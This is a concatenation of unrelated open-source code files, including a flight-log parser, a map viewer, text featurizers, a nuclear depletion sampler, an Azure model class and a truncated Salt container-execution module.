9: 'pull up',
10: 'pull down',
11: 'pull left',
12: 'pull right',
}
|
the-stack_0_25293
|
import struct
from typing import BinaryIO, List
from .Exceptions import *
class Record(object):
"""
one 512 byte record from IEFISBB.DAT
"""
timestamp: int
buffer: bytearray
position: int
eof: bool
def __init__(self, timestamp: int, buffer: bytearray):
self.timestamp = timestamp
self.buffer = buffer
self.position = 0
self.eof = False
def read(self, qty: int) -> bytearray:
"""
read qty bytes from the record
:param qty:
:return: bytearray
"""
if self.eof:
raise EndOfRecord()
remaining = len(self.buffer) - self.position
if qty < remaining:
buffer_slice = self.buffer[self.position: self.position + qty]
self.position += qty
return buffer_slice
else:
self.eof = True
return self.buffer[self.position:]
class MglPacketStream(object):
"""
stream of packets (a/k/a records) sent from the MGL iEFIS and stored in IEFISBB.DAT
"""
filepointer: BinaryIO
records: List[Record]
current_record: int
eof: bool
unread_buffer: bytearray
timestamp: int
RECORDSIZE = 512
def __init__(self, fp: BinaryIO, min_timestamp: int = 0, max_timestamp: int = 9000000000):
self.records = []
self.current_record = 0
self.eof = False
self.unread_buffer = bytearray(0)
self.filepointer = fp
self._load_records(min_timestamp, max_timestamp)
self._sort_records()
# print('Record timestamps:')
# lastTs = 0
# for record in self.records:
# print(' {ts:,}'.format(ts=record.timestamp))
# lastTs = record.timestamp
# print('*' * 100)
def _load_records(self, min_timestamp: int, max_timestamp: int) -> None:
while True:
buffer = self.filepointer.read(self.RECORDSIZE)
if 0 == len(buffer):
return
(timestamp, buf) = struct.unpack_from('I 508s', buffer)
if 0 != timestamp and (min_timestamp <= timestamp <= max_timestamp):
self.records.append(Record(timestamp, bytearray(buf)))
def _sort_records(self) -> None:
"""
Reorder the records so that they are in ascending order, so that nothing else has to deal with a flight
which wraps back to the beginning of the file
:return:
"""
for boundary in range(0, len(self.records) - 2):
if self.records[boundary].timestamp > self.records[boundary + 1].timestamp:
a = self.records[boundary + 1:]
b = self.records[:boundary + 1]
self.records = a + b
def read(self, qty: int) -> bytearray:
"""
read qty bytes from the stream, first checking for unread bytes (had been read and then pushed back ito the
stream) and then reading from as many records as necessary
:param qty:
:return: bytearray
"""
if self.eof:
raise EndOfFile()
if 0 < len(self.unread_buffer):
unread_bytes = min(len(self.unread_buffer), qty)
buffer = self.unread_buffer[:unread_bytes]
self.unread_buffer = self.unread_buffer[unread_bytes:]
if len(buffer) == qty:
return buffer
else:
buffer = bytearray(0)
still_needed = qty - len(buffer)
if self.records[self.current_record].eof:
self._next_record()
buffer.extend(self.records[self.current_record].read(still_needed))
self.timestamp = self.records[self.current_record].timestamp
if len(buffer) == qty:
return buffer
else:
self._next_record()
still_needed = qty - len(buffer)
buffer2 = self.read(still_needed)
buffer.extend(buffer2)
return buffer
def _next_record(self) -> None:
"""
get another record
:return:
"""
self.current_record += 1
if self.current_record >= len(self.records):
self.eof = True
raise EndOfFile()
def unread(self, buffer: int) -> None:
"""
take back, and store, a few bytes which had been read but were not needed
:param buffer:
:return:
"""
b = bytearray([buffer])
self.unread_buffer.extend(b)
|
the-stack_0_25295
|
from typing import Any, Callable, Dict, Tuple
from IPython.core.display import display
import xarray as xr
import matplotlib.pyplot as plt
# from bqplot import Axis, Figure, Lines, LinearScale
# from bqplot.interacts import IndexSelector
# from bqplot import pyplot as plt
# from ipyleaflet import basemaps, FullScreenControl, LayerGroup, Map, MeasureControl, Polyline, Marker, MarkerCluster, CircleMarker, WidgetControl
# from ipywidgets import Button, HTML, HBox, VBox, Checkbox, FileUpload, Label, Output, IntSlider, Layout, Image, link
from ipywidgets import Output, HTML
from ipyleaflet import Map, Marker, MarkerCluster, basemaps
# Had unexpected issues with displaying matplotlib in output widgets.
# https://github.com/jupyter-widgets/ipywidgets/issues/1853#issuecomment-349201240 seems to do the job...
from ipywidgets.widgets.interaction import show_inline_matplotlib_plots
class GeoViewer:
def __init__(self, x_data:xr.Dataset, lat:str='lat', lon:str='lon', key:str='station'):
# TODO: checks on inputs
self.marker_info:Dict[Tuple[float,float],str] = dict()
self.x_data = x_data
lats = x_data[lat].values
lons = x_data[lon].values
self.lat_key = lat
self.lon_key = lon
self.key = key
values = x_data[key].values
n= len(lats)
for i in range(n):
self.add_marker_info(lats[i], lons[i], values[i])
self.create_popup = self._simple_html_popup()
def add_marker_info(self, lat:float, lon:float, code:str):
self.marker_info[(lat, lon)] = code
def get_code(self, lat:float, lon:float):
return self.marker_info[(lat, lon)]
def data_for_identifier(self, ident):
raise NotImplementedError()
def popup_factory(self, func:Callable[[Tuple[float,float]],HTML]):
self.create_popup = func
def _simple_html_popup(self) -> Callable:
def f(location):
message = HTML()
message.description = "Station ID"
message.value = str(self.marker_info[location])
message.placeholder = ""
return message
return f
def build_map(self, click_handler:Callable[[Dict[str,Any]], None]) -> Map:
mean_lat = self.x_data[self.lat_key].values.mean()
mean_lng = self.x_data[self.lon_key].values.mean()
# create the map
m = Map(center=(mean_lat, mean_lng), zoom=4, basemap=basemaps.Stamen.Terrain)
m.layout.height = '1200px'
# show trace
markers = []
for k in self.marker_info:
message = self.create_popup(k)
marker = Marker(location=k)
marker.on_click(click_handler)
marker.popup = message
markers.append(marker)
marker_cluster = MarkerCluster(
markers=markers
)
# not sure whether we could register once instead of each marker:
# marker_cluster.on_click(click_handler)
m.add_layer(marker_cluster)
# m.add_control(FullScreenControl())
return m
def get_data(self, variable:str, loc_id:str, dim_id:str = None):
"""
"""
if dim_id is None:
dim_id = self.key
return self.x_data[variable].sel({dim_id: loc_id})
def plot_series(self, out_widget:Output, variable: str, loc_id: str, dim_id:str = None):
"""
"""
tts = self.get_data(variable=variable, loc_id=loc_id, dim_id=dim_id)
# if using bqplot down the track, see https://github.com/jtpio/voila-gpx-viewer
out_widget.clear_output()
with out_widget:
_ = tts.plot(figsize=(16,8))
            # avoid display(...) here, since it would also print the matplotlib Line2D repr
ax = plt.gca()
ax.set_title(loc_id)
show_inline_matplotlib_plots()
def mk_click_handler_plot_ts(self, out_widget:Output, variable='q_obs_mm'):
def click_handler_plot_ts(**kwargs):
xy = kwargs['coordinates']
ident = self.get_code(xy[0], xy[1])
self.plot_series(out_widget, variable=variable, loc_id=ident)
return click_handler_plot_ts
# If printing a data frame straight to an output widget
# def raw_print(out, ident):
# x_data = globalthing.data_for_identifier(ident)
# out.clear_output()
# with out:
# print(ident)
# print(x_data)
# def click_handler_rawprint(**kwargs):
# blah = dict(**kwargs)
# xy = blah['coordinates']
# ident = globalthing.get_code(xy[0], xy[1])
# raw_print(out, ident)
def click_handler_no_op(**kwargs):
return
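# Hedged usage sketch (dataset and variable names are assumptions): wire the map
# markers to an Output widget that plots the clicked station's time series.
def _example_station_map(x_data):
    out = Output()
    viewer = GeoViewer(x_data, lat='lat', lon='lon', key='station')
    handler = viewer.mk_click_handler_plot_ts(out, variable='q_obs_mm')
    return viewer.build_map(handler), out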
|
the-stack_0_25296
|
# -*- coding: utf-8 -*-
#!/usr/bin/env python
import sys
import argparse
import base64
import urllib.parse
import random
def base64_encode(args=None):
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--decode', action='store_true', help='base64 decode')
parser.add_argument('input', help='the str to be encode/decode')
if not args:
args = sys.argv[1:]
result = parser.parse_args(args)
if result.decode:
__base64_decode(result.input)
else:
__base64_encode(result.input)
def url_encode(args=None):
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--decode', action='store_true', help='url decode')
parser.add_argument('input', help='the str to be encode/decode')
if not args:
args = sys.argv[1:]
result = parser.parse_args(args)
if result.decode:
__url_decode(result.input)
else:
__url_encode(result.input)
def roll(min=1, max=100):
try:
max = int(sys.argv[2])
except IndexError as e:
try:
max = int(sys.argv[1])
except:
pass
else:
min = int(sys.argv[1])
num = random.randint(min, max)
print(num)
def __base64_encode(s):
print(base64.standard_b64encode(s.encode()).decode())
def __base64_decode(s):
print(base64.standard_b64decode(s.encode()).decode())
def __url_encode(s):
print(urllib.parse.quote(s))
def __url_decode(s):
print(urllib.parse.unquote(s))
def main():
base64_encode(['hello'])
url_encode(['https://www.baidu.com'])
roll()
roll(10)
roll(12, 13)
if __name__ == '__main__':
main()
|
the-stack_0_25297
|
"""
Class responsible for reading multiple depletion files
and obtaining true uncertainties
"""
from math import fabs
from numpy import zeros, zeros_like
from matplotlib import pyplot
from serpentTools.messages import SamplerError, warning
from serpentTools.utils import (
magicPlotDocDecorator, formatPlot, DEPLETION_PLOT_LABELS,
)
from serpentTools.objects.materials import DepletedMaterialBase
from serpentTools.parsers.depletion import DepletionReader, DepPlotMixin
from serpentTools.samplers.base import (
Sampler, SampledContainer,
)
CONSTANT_MDATA = ('names', 'zai')
"""metadata that should be invariant throughout repeated runs"""
VARIED_MDATA = ('days', 'burnup')
"""metadata that could be varied throughout repeated runs"""
class DepletionSampler(DepPlotMixin, Sampler):
__doc__ = """
Class that reads and stores data from multiple ``*dep.m`` files
The following checks are performed in order to ensure that depletion
files are of similar form:
1. Keys of ``materials`` dictionary are consistent for all parsers
2. Metadata keys are consistent for all parsers
3. Isotope names and ZZAAA metadata are equal for all parsers
These tests can be skipped by settings ``<sampler.skipPrecheck>`` to be
``False``.
Parameters
----------
files: str or iterable
Single file or iterable (list) of files from which to read.
Supports file globs, ``*dep.m`` expands to all files that
end with ``dep.m``
Attributes
----------
materials: dict
Dictionary with material names as keys and the corresponding
:py:class:`~serpentTools.objects.materials.DepletedMaterial` class
for that material as values
metadata: dict
Dictionary with file-wide data names as keys and the
corresponding data, e.g. ``'zai'``: [list of zai numbers]
metadataUncs: dict
Dictionary containing uncertainties in file-wide metadata,
such as burnup schedule
allMdata: dict
Dictionary where key, value pairs are name of metadata and
metadata arrays for all runs. Arrays with be of one greater dimension,
as the first index corresponds to the file index.
files: set
Unordered set containing full paths of unique files read
settings: dict
Dictionary of sampler-wide settings
parsers: set
Unordered set of all parsers that were successful
map: dict
Dictionary where key, value pairs are files and their corresponding
parsers
"""
def __init__(self, files):
self.materials = {}
self.metadata = {}
self.metadataUncs = {}
self.allMdata = {}
Sampler.__init__(self, files, DepletionReader)
DepPlotMixin.__init__(self)
def __getitem__(self, name):
"""Retrieve a material from :attr:`materials`."""
return self.materials[name]
def _precheck(self):
self._checkParserDictKeys('materials')
self._checkParserDictKeys('metadata')
self._checkMetadata()
def _checkMetadata(self):
misMatch = {}
for parser in self:
for key, value in parser.metadata.items():
valCheck = (tuple(value) if key in CONSTANT_MDATA
else value.size)
if key not in misMatch:
misMatch[key] = {}
if valCheck not in misMatch[key]:
misMatch[key][valCheck] = {parser.filePath}
else:
misMatch[key][valCheck].add(parser.filePath)
for mKey, matches in misMatch.items():
if len(matches) > 1:
self._raiseErrorMsgFromDict(matches, 'values',
'{} metadata'.format(mKey))
def _process(self):
for N, parser in enumerate(self.parsers):
if not self.metadata:
self.__allocateMetadata(parser.metadata)
self._copyMetadata(parser.metadata, N)
for matName, material in parser.materials.items():
if matName in self.materials:
sampledMaterial = self.materials[matName]
else:
numFiles = len(self.parsers)
self.materials[matName] = sampledMaterial = (
SampledDepletedMaterial(numFiles, material.name,
parser.metadata))
sampledMaterial.loadFromContainer(material)
self._finalize()
def _finalize(self):
for _matName, material in self.materials.items():
material.finalize()
for key in VARIED_MDATA:
allData = self.allMdata[key]
self.metadata[key] = allData.mean(axis=0)
self.metadataUncs[key] = allData.std(axis=0)
def __allocateMetadata(self, parserMdata):
for key in CONSTANT_MDATA:
self.metadata[key] = parserMdata[key]
vectorShape = tuple([len(self.files)]
+ list(parserMdata['days'].shape))
for key in VARIED_MDATA:
self.allMdata[key] = zeros(vectorShape)
def _copyMetadata(self, parserMdata, N):
for key in VARIED_MDATA:
self.allMdata[key][N, ...] = parserMdata[key]
def _free(self):
self.allMdata = {}
for _mName, material in self.materials.items():
material.free()
def iterMaterials(self):
"""Yields material names and objects"""
for name, material in self.materials.items():
yield name, material
class SampledDepletedMaterial(SampledContainer, DepletedMaterialBase):
__doc__ = """
Class that stores data from a variety of depleted materials
{equiv:s}
.. note ::
:py:func:`~serpentTools.samplers.depletion.SampledDepletedMaterial.free`
sets ``allData`` to an empty dictionary {free:s}
Parameters
----------
N: int
Number of containers to expect
name: str
Name of this material
metadata: dict
File-wide metadata for this run. Should contain ZAI and names for all
isotopes, days, and burnup schedule
Attributes
----------
{depAttrs:s}
uncertainties: dict
Absolute uncertainties for all variables stored in ``data``
allData: dict
Dictionary where key, value pairs correspond to names of
variables stored on this object and arrays of data from all files.
The dimensionality will be increased by one, as the first index
corresponds to the order in which files were loaded
""".format(free=SampledContainer.docFree,
equiv=DepletedMaterialBase.docEquiv,
depAttrs=DepletedMaterialBase.docAttrs)
def __init__(self, N, name, metadata):
SampledContainer.__init__(self, N, DepletedMaterialBase)
DepletedMaterialBase.__init__(self, name, metadata)
self.uncertainties = {}
self.allData = {}
def _loadFromContainer(self, container):
if container.name != self.name:
warning("Attempting to store data from material {} onto "
"sampled material {}".format(self.name, container.name))
for varName, varData in container.data.items():
if not self.allData:
self.__allocateLike(container)
self.allData[varName][self._index] = varData
def __allocateLike(self, container):
for varName, varData in container.data.items():
shape = tuple([self.N] + list(varData.shape))
self.allData[varName] = zeros(shape)
def _finalize(self):
for varName, varData in self.allData.items():
self.data[varName] = varData.mean(axis=0)
self.uncertainties[varName] = varData.std(axis=0)
def free(self):
"""Clear up data from all sampled parsers"""
self.allData = {}
@magicPlotDocDecorator
def plot(self, xUnits, yUnits, timePoints=None, names=None, ax=None,
sigma=3, xlabel=None, ylabel=None, logx=False,
logy=False, loglog=False, legend=None, ncol=1, labelFmt=None,
**kwargs):
"""
Plot the average of some data vs. time for some or all isotopes.
.. note::
``kwargs`` will be passed to the errorbar plot for all
isotopes. If ``c='r'`` is passed, to make a plot red, then
data for all isotopes plotted will be red and potentially
very confusing.
Parameters
----------
xUnits: str
name of x value to obtain, e.g. ``'days'``, ``'burnup'``
yUnits: str
name of y value to return, e.g. ``'adens'``, ``'burnup'``
timePoints: list or None
If given, select the time points according to those
specified here. Otherwise, select all points
names: list or None
If given, return y values corresponding to these isotope
names. Otherwise, return values for all isotopes.
{ax}
{sigma}
{xlabel}
{ylabel}
{logx}
{logy}
{loglog}
{legend}
{ncol}
{matLabelFmt}
{kwargs} :py:func:`matplotlib.pyplot.errorbar`
Returns
-------
{rax}
See Also
--------
* :meth:`~serpentTools.objects.materials.
DepletedMaterialBase.getValues`
* :func:`matplotlib.pyplot.errorbar`
"""
if sigma and yUnits not in self.uncertainties:
raise KeyError("Uncertainties for {} not stored"
.format(yUnits))
if xUnits not in ('days', 'burnup'):
raise KeyError("Plot method only uses x-axis data from <days> "
"and <burnup>, not {}".format(xUnits))
xVals = timePoints if timePoints is not None else (
self.days if xUnits == 'days' else self.burnup)
sigma = int(fabs(sigma))
colIndices = self._getColIndices(xUnits, timePoints)
rowIndices = self._getRowIndices(names)
yVals = self._slice(self.data[yUnits], rowIndices, colIndices)
yUncs = self._slice(self.uncertainties[yUnits], rowIndices, colIndices)
if xUnits in self.uncertainties and sigma:
xUncs = (sigma * self._slice(self.uncertainties[xUnits], None,
colIndices))
else:
xUncs = zeros_like(xVals)
ax = ax or pyplot.gca()
labels = self._formatLabel(labelFmt, names)
yVals = yVals.copy(order='F')
yUncs = yUncs.copy(order='F') * sigma
for row in range(yVals.shape[0]):
ax.errorbar(xVals, yVals[row], yerr=yUncs[row], xerr=xUncs,
label=labels[row], **kwargs)
ax = sigmaLabel(ax, xlabel or DEPLETION_PLOT_LABELS[xUnits],
ylabel or DEPLETION_PLOT_LABELS[yUnits], sigma)
formatPlot(ax, legend=legend, ncol=ncol, loglog=loglog, logx=logx,
logy=logy)
return ax
@magicPlotDocDecorator
def spreadPlot(self, xUnits, yUnits, isotope=None, zai=None,
sampleKwargs=None, meanKwargs=None,
timePoints=None, ax=None,
xlabel=None, ylabel=None, logx=False, logy=False,
loglog=False, legend=True):
"""
Plot the mean quantity and data from all sampled files.
Parameters
----------
xUnits : str
name of x value to obtain, e.g. ``'days'``, ``'burnup'``
yUnits : str
name of y value to return, e.g. ``'adens'``, ``'burnup'``
isotope : str, optional
Plot data for this isotope
zai : int, optional
Plot data for this isotope. Not allowed if ``isotope`` given.
sampleKwargs : dict, optional
Additional matplotlib-acceptable arguments to be passed into the
plot when plotting data from unique runs, e.g.
``{"c": k, "alpha": 0.5}``.
meanKwargs : dict, optional
            Additional matplotlib-acceptable arguments to be used when
plotting the mean value, e.g. ``{"c": "b", "marker": "o"}``
timePoints : list or None
If given, select the time points according to those
specified here. Otherwise, select all points
{ax}
{xlabel}
{ylabel}
{logx}
{logy}
{loglog}
{legend}
Returns
-------
{rax}
"""
if not self.allData:
raise SamplerError("Data from all sampled files has been freed "
"and cannot be used in this plot method")
if isotope is not None and zai is not None:
raise ValueError("Please specify isotope name or zai, not both")
elif isotope is None and zai is None:
raise ValueError("Isotope name or zai needed")
if sampleKwargs is None:
sampleKwargs = {"c": "k", "alpha": 0.5, "marker": ""}
if meanKwargs is None:
meanKwargs = {"c": "#0173b2", "marker": "o"}
ax = ax or pyplot.gca()
if xUnits not in ('days', 'burnup'):
raise KeyError("Plot method only uses x-axis data from <days> "
"and <burnup>, not {}".format(xUnits))
xVals = timePoints if timePoints is not None else (
self.days if xUnits == 'days' else self.burnup)
if isotope is not None:
rows = self._getRowIndices("names", [isotope])
else:
rows = self._getRowIndices("zai", [zai])
cols = self._getColIndices(xUnits, timePoints)
primaryData = self._slice(self.data[yUnits], rows, cols)[0]
for data in self.allData[yUnits][:self._index]:
plotData = self._slice(data, rows, cols)[0]
ax.plot(xVals, plotData, **sampleKwargs)
ax.plot(xVals, primaryData, label='Mean value', **meanKwargs)
ax = sigmaLabel(ax, xlabel or DEPLETION_PLOT_LABELS[xUnits],
ylabel or DEPLETION_PLOT_LABELS[yUnits])
formatPlot(ax, legend=legend, logx=logx, logy=logy, loglog=loglog)
return ax
def sigmaLabel(ax, xlabel, ylabel, sigma=None):
"""Label the axes on a figure with some uncertainty."""
confStr = r'$\pm{} \sigma$'.format(sigma) if sigma is not None else ''
ax.set_xlabel(xlabel + confStr)
ax.set_ylabel(ylabel + confStr)
return ax
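# Hedged usage sketch (illustrative, not part of serpentTools): read several
# repeated depletion runs, then plot the mean value and the spread for a single
# isotope. The glob pattern and the material/isotope names are assumptions.
if __name__ == '__main__':
    sampler = DepletionSampler('case_*_dep.m')
    fuel = sampler['fuel']  # a SampledDepletedMaterial with mean data and uncertainties
    fuel.plot('days', 'adens', names=['Xe135'], sigma=3)
    fuel.spreadPlot('days', 'adens', isotope='Xe135')
    pyplot.show()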
|
the-stack_0_25300
|
from typing import List
# pre_model_basic_words = load_pre_model(os.path.join(os.path.dirname(__file__),
# './pre_models/basic_words.pkl'))
# pip install lexicalrichness
from lexicalrichness import LexicalRichness
# nltk package for featurizing
import nltk
# spacy package for featurizing
import spacy
from datalabs.operations.featurize.featurizing import featurizing
# pretrained models
from datalabs.operations.featurize.utils.util_model import (
BASIC_WORDS,
load_gender_bias_data,
)
# from hatesonar import Sonar
# sonar = Sonar()
# print(pre_model_basic_words)
@featurizing(
name="get_length",
contributor="datalab",
task="Any",
description="This function is used to calculate the length of a text",
)
def get_length(text: str) -> dict:
    """
    Package: python
    Input:
        text: str
    Output:
        dict with key "length": the number of whitespace-separated tokens
    """
# text = sample["text"]
return {"length": len(text.split(" "))}
# return
@featurizing(
name="get_entities_spacy",
contributor="spacy",
task="Any",
description="Extract entities of a given text by using spacy library.",
)
def get_entities_spacy(text: str) -> dict:
nlp = spacy.load("en_core_web_sm") # this should be pre-reloaded
doc = nlp(text)
entities = [(ent.text, ent.label_) for ent in doc.ents]
return {"entities": entities}
# return entities
@featurizing(
name="get_postag_spacy",
contributor="spacy",
task="Any",
description="Part-of-speech tagging of a given text by using spacy library.",
)
def get_postag_spacy(text: str) -> dict:
nlp = spacy.load("en_core_web_sm") # this should be pre-reloaded
doc = nlp(text)
# token_postags = [(token.text, token.tag_) for token in doc]
tokens = [token.text for token in doc]
tags = [token.tag_ for token in doc]
return {"tokens": tokens, "pos_tags": tags}
@featurizing(
name="get_postag_nltk",
contributor="nltk",
task="Any",
description="Part-of-speech tagging of a given text by " "using NLTK library",
)
def get_postag_nltk(text: str) -> dict:
    """
    Package: nltk.pos_tag
    Input:
        text: str
    Output:
        dict with keys "tokens" and "pos_tags"
    """
from nltk import pos_tag
try:
nltk.pos_tag([])
except LookupError:
nltk.download("averaged_perceptron_tagger")
token_tag_tuples = pos_tag(text.split(" "))
tokens = [xx[0] for xx in token_tag_tuples]
tags = [xx[1] for xx in token_tag_tuples]
# pos_tags = [(res[0], res[1]) for res in token_tag_tuples]
return {"tokens": tokens, "pos_tags": tags}
@featurizing(
name="get_basic_words",
contributor="datalab",
task="Any",
description="Calculate the ratio of basic words in a given text",
)
def get_basic_words(sentence: str):
# the sentence must written in english
# sample level
# sentence : string 'XXX'
if BASIC_WORDS is None:
raise ValueError("basic word dictionary is none")
value_list = sentence.split(" ")
n_words = len(value_list)
n_basic_words = 0
for word in value_list:
lower = word.lower()
if lower in BASIC_WORDS:
n_basic_words = n_basic_words + 1
return {"basic_word_ratio": n_basic_words * 1.0 / n_words}
# return n_basic_words*1.0/n_words
@featurizing(
name="get_lexical_richness",
contributor="lexicalrichness",
task="Any",
description="Calculate the lexical richness (i.e.lexical diversity)" " of a text",
)
def get_lexical_richness(sentence: str):
# sample level
# sentence : string 'XXX'
from lexicalrichness import LexicalRichness
# print(f"-------\n{sentence}\n")
lex = LexicalRichness(sentence)
results = 0
try:
results = lex.ttr
except ZeroDivisionError:
print(
            f'the sentence "{sentence}" contains no effective words, we will'
f" return 0 instead!"
)
finally:
# return results
return {"lexical_diversity": results}
gendered_dic = load_gender_bias_data()
@featurizing(
name="get_gender_bias",
contributor="datalab",
task="Any",
description="Calculate the number of man/women tokens of a given text",
)
def get_gender_bias(sentence: str):
# if gendered_dic is None:
# gendered_dic = load_gender_bias_data()
one_words_results = get_gender_bias_one_word(
gendered_dic["words"]["male"],
gendered_dic["words"]["female"],
gendered_dic["single_name"]["male"],
gendered_dic["single_name"]["female"],
sentence,
)
results = {
"word": {
"male": one_words_results["words_m"],
"female": one_words_results["words_f"],
},
"single_name": {
"male": one_words_results["single_name_m"],
"female": one_words_results["single_name_f"],
},
}
# return results
return {"gender_bias_info": results}
def get_gender_bias_one_word(words_m, words_f, single_name_m, single_name_f, sentence):
words_sentence = sentence.lower().split(" ")
results = {
"words_m": 0,
"words_f": 0,
"single_name_m": 0,
"single_name_f": 0,
}
for value in words_sentence:
if value in words_m:
results["words_m"] += 1
if value in words_f:
results["words_f"] += 1
if value in single_name_m:
results["single_name_m"] += 1
if value in single_name_f:
results["single_name_f"] += 1
return results
"""
from datalabs import load_dataset
dataset = load_dataset("mr")
from featurize import *
res = dataset['test'].apply(get_features_sample_level, mode = "memory")
"""
@featurizing(
name="get_features_sample_level",
contributor="datalab",
task="Any",
description="calculate a set of features for general text",
)
def get_features_sample_level(text: str):
# for hate speech
# from hatesonar import Sonar
# sonar = Sonar()
# text length
length = len(text.split(" "))
# lexical_richness
lex = LexicalRichness(text)
lexical_richness = float(0.0)
try:
lexical_richness = lex.ttr
except ZeroDivisionError:
print(
            f'the sentence "{text}" contains no effective words, we will'
f" return 0 instead!"
)
# ratio of basic words
if BASIC_WORDS is None:
raise ValueError("basic word dictionary is none")
value_list = text.split(" ")
n_words = len(value_list)
n_basic_words = 0
for word in value_list:
lower = word.lower()
if lower in BASIC_WORDS:
n_basic_words = n_basic_words + 1
basic_words = n_basic_words * 1.0 / n_words if n_words != 0 else float(0)
# Gender bias
one_words_results = get_gender_bias_one_word(
gendered_dic["words"]["male"],
gendered_dic["words"]["female"],
gendered_dic["single_name"]["male"],
gendered_dic["single_name"]["female"],
text,
)
# # # hataspeech
# hatespeech = {}
# results = sonar.ping(text=text)
# class_ = results['top_class']
# confidence = float(0)
# for value in results['classes']:
# if value['class_name'] == class_:
# confidence = value['confidence']
# break
# hate_speech_detection = {"hate_speech_type":class_, "confidence":confidence}
# pyarrow will report error if saving json
return {
"length": length,
"lexical_richness": lexical_richness,
"basic_words": basic_words,
"gender_bias_word_male": one_words_results["words_m"],
"gender_bias_word_female": one_words_results["words_f"],
"gender_bias_single_name_male": one_words_results["single_name_m"],
"gender_bias_single_name_female": one_words_results["single_name_f"],
# "hate_speech_detection":class_,
}
|
the-stack_0_25303
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class LinkedIntegrationRuntime(Model):
"""The linked integration runtime information.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar name: The name of the linked integration runtime.
:vartype name: str
:ivar subscription_id: The subscription ID for which the linked
integration runtime belong to.
:vartype subscription_id: str
:ivar data_factory_name: The name of the data factory for which the linked
integration runtime belong to.
:vartype data_factory_name: str
:ivar data_factory_location: The location of the data factory for which
the linked integration runtime belong to.
:vartype data_factory_location: str
:ivar create_time: The creating time of the linked integration runtime.
:vartype create_time: datetime
"""
_validation = {
'name': {'readonly': True},
'subscription_id': {'readonly': True},
'data_factory_name': {'readonly': True},
'data_factory_location': {'readonly': True},
'create_time': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'subscription_id': {'key': 'subscriptionId', 'type': 'str'},
'data_factory_name': {'key': 'dataFactoryName', 'type': 'str'},
'data_factory_location': {'key': 'dataFactoryLocation', 'type': 'str'},
'create_time': {'key': 'createTime', 'type': 'iso-8601'},
}
def __init__(self):
super(LinkedIntegrationRuntime, self).__init__()
self.name = None
self.subscription_id = None
self.data_factory_name = None
self.data_factory_location = None
self.create_time = None
|
the-stack_0_25304
|
# -*- coding: utf-8 -*-
"""
Common resources for LXC and systemd-nspawn containers
.. versionadded:: 2015.8.0
These functions are not designed to be called directly, but instead from the
:mod:`lxc <salt.modules.lxc>`, :mod:`nspawn <salt.modules.nspawn>`, and
:mod:`docker <salt.modules.docker>` execution modules. They provide for
common logic to be re-used for common actions.
"""
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import copy
import functools
import logging
import os
import pipes
import time
import traceback
# Import salt libs
import salt.utils.args
import salt.utils.path
import salt.utils.vt
from salt.exceptions import CommandExecutionError, SaltInvocationError
log = logging.getLogger(__name__)
PATH = "PATH=/bin:/usr/bin:/sbin:/usr/sbin:/opt/bin:" "/usr/local/bin:/usr/local/sbin"
def _validate(wrapped):
"""
Decorator for common function argument validation
"""
@functools.wraps(wrapped)
def wrapper(*args, **kwargs):
container_type = kwargs.get("container_type")
exec_driver = kwargs.get("exec_driver")
valid_driver = {
"docker": ("lxc-attach", "nsenter", "docker-exec"),
"lxc": ("lxc-attach",),
"nspawn": ("nsenter",),
}
if container_type not in valid_driver:
raise SaltInvocationError(
"Invalid container type '{0}'. Valid types are: {1}".format(
container_type, ", ".join(sorted(valid_driver))
)
)
if exec_driver not in valid_driver[container_type]:
raise SaltInvocationError(
"Invalid command execution driver. Valid drivers are: {0}".format(
", ".join(valid_driver[container_type])
)
)
if exec_driver == "lxc-attach" and not salt.utils.path.which("lxc-attach"):
raise SaltInvocationError(
"The 'lxc-attach' execution driver has been chosen, but "
"lxc-attach is not available. LXC may not be installed."
)
return wrapped(*args, **salt.utils.args.clean_kwargs(**kwargs))
return wrapper
def _nsenter(pid):
"""
Return the nsenter command to attach to the named container
"""
return "nsenter --target {0} --mount --uts --ipc --net --pid".format(pid)
def _get_md5(name, path, run_func):
"""
Get the MD5 checksum of a file from a container
"""
output = run_func(
name, "md5sum {0}".format(pipes.quote(path)), ignore_retcode=True
)["stdout"]
try:
return output.split()[0]
except IndexError:
# Destination file does not exist or could not be accessed
return None
def cache_file(source):
"""
Wrapper for cp.cache_file which raises an error if the file was unable to
be cached.
CLI Example:
.. code-block:: bash
salt myminion container_resource.cache_file salt://foo/bar/baz.txt
"""
try:
# Don't just use cp.cache_file for this. Docker has its own code to
# pull down images from the web.
if source.startswith("salt://"):
cached_source = __salt__["cp.cache_file"](source)
if not cached_source:
raise CommandExecutionError("Unable to cache {0}".format(source))
return cached_source
except AttributeError:
raise SaltInvocationError("Invalid source file {0}".format(source))
return source
@_validate
def run(
name,
cmd,
container_type=None,
exec_driver=None,
output=None,
no_start=False,
stdin=None,
python_shell=True,
output_loglevel="debug",
ignore_retcode=False,
path=None,
use_vt=False,
keep_env=None,
):
"""
Common logic for running shell commands in containers
path
path to the container parent (for LXC only)
default: /var/lib/lxc (system default)
CLI Example:
.. code-block:: bash
salt myminion container_resource.run mycontainer 'ps aux' container_type=docker exec_driver=nsenter output=stdout
"""
valid_output = ("stdout", "stderr", "retcode", "all")
if output is None:
cmd_func = "cmd.run"
elif output not in valid_output:
raise SaltInvocationError(
"'output' param must be one of the following: {0}".format(
", ".join(valid_output)
)
)
else:
cmd_func = "cmd.run_all"
if keep_env is None or isinstance(keep_env, bool):
to_keep = []
elif not isinstance(keep_env, (list, tuple)):
try:
to_keep = keep_env.split(",")
except AttributeError:
log.warning("Invalid keep_env value, ignoring")
to_keep = []
else:
to_keep = keep_env
if exec_driver == "lxc-attach":
full_cmd = "lxc-attach "
if path:
full_cmd += "-P {0} ".format(pipes.quote(path))
if keep_env is not True:
full_cmd += "--clear-env "
if "PATH" not in to_keep:
full_cmd += "--set-var {0} ".format(PATH)
# --clear-env results in a very restrictive PATH
# (/bin:/usr/bin), use a good fallback.
full_cmd += " ".join(
[
"--set-var {0}={1}".format(x, pipes.quote(os.environ[x]))
for x in to_keep
if x in os.environ
]
)
